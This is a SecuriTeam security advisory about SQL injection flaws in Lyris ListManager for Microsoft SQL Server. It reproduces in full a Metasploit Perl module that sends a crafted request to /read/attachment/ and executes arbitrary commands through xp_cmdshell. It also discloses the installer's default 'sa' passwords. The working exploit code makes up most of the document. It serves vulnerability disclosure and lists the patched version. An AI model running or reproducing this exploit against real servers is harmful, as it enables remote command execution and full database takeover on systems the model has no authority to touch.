[EXPL] Lyris ListManager Multiple Vulnerabilities (Exploit)

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Lyris ListManager Multiple Vulnerabilities (Exploit)
------------------------------------------------------------------------


SUMMARY

" <http://www.lyris.com/products/listmanager/index.html> Lyris 
ListManager, is the world's most popular software solution for managing 
and growing in-house email lists, as well as creating highly effective 
email campaigns, newsletters, and discussion groups."

The following Metasploit module exploits a SQL injection flaw in the Lyris 
ListManager software for Microsoft SQL Server. This SQL injection flaw 
allows for arbitrary commands to be executed with administrative 
privileges by calling the xp_cmdshell stored procedure. Additionally, a 
window of opportunity is opened during the ListManager for MSDE install 
process; the 'sa' account is set to the password 'lminstall' for a 5-10 
minute period. After the installer finishes, the password is permanently 
set to 'lyris' followed by the process ID of the installer (a 1-5 digit 
number).

DETAILS

Vulnerable Systems:
 * Lyris ListManager version 5.x
 * Lyris ListManager version 6.x
 * Lyris ListManager version 7.x
 * Lyris ListManager version 8.x

Immune Systems:
 * Lyris ListManager version 8.9b

Exploit:
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::lyris_attachment_mssql;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
 'Name'  => 'Lyris ListManager Attachment SQL Injection (MSSQL)',
 'Version'  => '$Revision: 1.2 $',
 'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
 'Arch'  => [ ],
 'OS'    => [ 'win32' ],
 'Priv'  => 1,
 'UserOpts'  =>
   {
  'RHOST' => [1, 'ADDR', 'The target address'],
  'RPORT' => [1, 'PORT', 'The target port', 80],
  'SSL'   => [0, 'BOOL', 'Use SSL'],
   },

 'Payload' =>
   {
    'Space' => 1000,
  'Keys'  => ['cmd'],
   },

 'Description'  => Pex::Text::Freeform(qq{
  This module exploits a SQL injection flaw in the Lyris ListManager
 software for Microsoft SQL Server. This flaw allows for arbitrary 
commands
 to be executed with administrative privileges by calling the xp_cmdshell
 stored procedure. Additionally, a window of opportunity is opened during 
the
 ListManager for MSDE install process; the 'sa' account is set to the 
password 'lminstall'
 for a 5-10 minute period. After the installer finishes, the password is
 permanently set to 'lyris' followed by the process ID of the installer (a 
1-5 digit number).
}),

 'Refs'  =>
   [
  ['URL',   'http://metasploit.com/research/vulns/lyris_listmanager/'],
  ['OSVDB', '21548'],
   ],
   
 'DefaultTarget' => 0,
 'Targets' =>
   [
  ['No target needed.'],
   ],

 'Keys' => ['lyris'],
  };

sub new {
 my $class = shift;
 my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, 
@_);
 return($self);
}

sub Check {
 my $self = shift;
 my $target_host = $self->GetVar('RHOST');
 my $target_port = $self->GetVar('RPORT');

 my $s = Msf::Socket::Tcp->new
   (
  'PeerAddr'  => $target_host,
  'PeerPort'  => $target_port,
  'LocalPort' => $self->GetVar('CPORT'),
  'SSL'       => $self->GetVar('SSL'),
   );
 if ($s->IsError) {
  $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  return $self->CheckCode('Connect');
 }

 $s->Send("GET /read/attachment/' HTTP/1.1\r\nHost: 
$target_host:$target_port\r\n\r\n");

 my $r = $s->Recv(-1, 5);

 if ($r =~ /Unclosed quotation mark before/) {
  $self->PrintLine("[*] Vulnerable installation detected ;)");
  return $self->CheckCode('Detected');
 }
 
 if ($r =~ /SQL error reported from Lyris/) {
  $self->PrintLine("[*] Vulnerable installation, but not running MSSQL.");
  return $self->CheckCode('Safe');
 }
 
 if ($r =~ /ListManagerWeb.*Content-Length: 0/sm) {
  $self->PrintLine("[*] This system appears to be patched");
  return $self->CheckCode('Safe');
 }
 
 $self->PrintLine("[*] Unknown response, patched or invalid target.");
 return $self->CheckCode('Safe');
}

sub Exploit {
 my $self = shift;
 my $target_host = $self->GetVar('RHOST');
 my $target_port = $self->GetVar('RPORT');
 my $target_idx  = $self->GetVar('TARGET');

 my $cmd = $self->GetVar('EncodedPayload')->RawPayload;

 my $sql =
  'DECLARE @X NVARCHAR(4000);'.
  'SET @X= ';

 foreach my $c (unpack('C*', $cmd)) {
  $sql .= "CHAR($c) + ";
 }
 $sql .= "'\x20';";
 $sql .= 'EXEC MASTER..XP_CMDSHELL @X';

 my $url = "/read/attachment/1;".$self->URLEncode($sql).";--";


 my $request =
   "GET $url HTTP/1.1\r\n".
   "Host: $target_host:$target_port\r\n\r\n";

 my $s = Msf::Socket::Tcp->new
   (
  'PeerAddr'  => $target_host,
  'PeerPort'  => $target_port,
  'LocalPort' => $self->GetVar('CPORT'),
  'SSL'       => $self->GetVar('SSL'),
   );
 if ($s->IsError) {
  $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  return;
 }

 $self->PrintLine("[*] Sending " .length($request) . " bytes to remote 
host.");
 $s->Send($request);

 $self->PrintLine("[*] Waiting for a response...");
 $s->Recv(-1, 10);
 $self->Handler($s);
 $s->Close();
 return;
}

sub URLEncode {
 my $self = shift;
 my $data = shift;
 my $res;

 foreach my $c (unpack('C*', $data)) {
  if (
   ($c >= 0x30 && $c <= 0x39) ||
   ($c >= 0x41 && $c <= 0x5A) ||
   ($c >= 0x61 && $c <= 0x7A)
    ) {
   $res .= chr($c);
  } else {
   $res .= sprintf("%%%.2x", $c);
  }
 }
 return $res;
}

1;


ADDITIONAL INFORMATION

The information has been provided by  <mailto:sflist@digitaloffense.net> H 
D Moore.
The original article can be found at:  
<http://metasploit.com/projects/Framework/modules/exploits/lyris_attachment_mssql.pm>
 
http://metasploit.com/projects/Framework/modules/exploits/lyris_attachment_mssql.pm



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.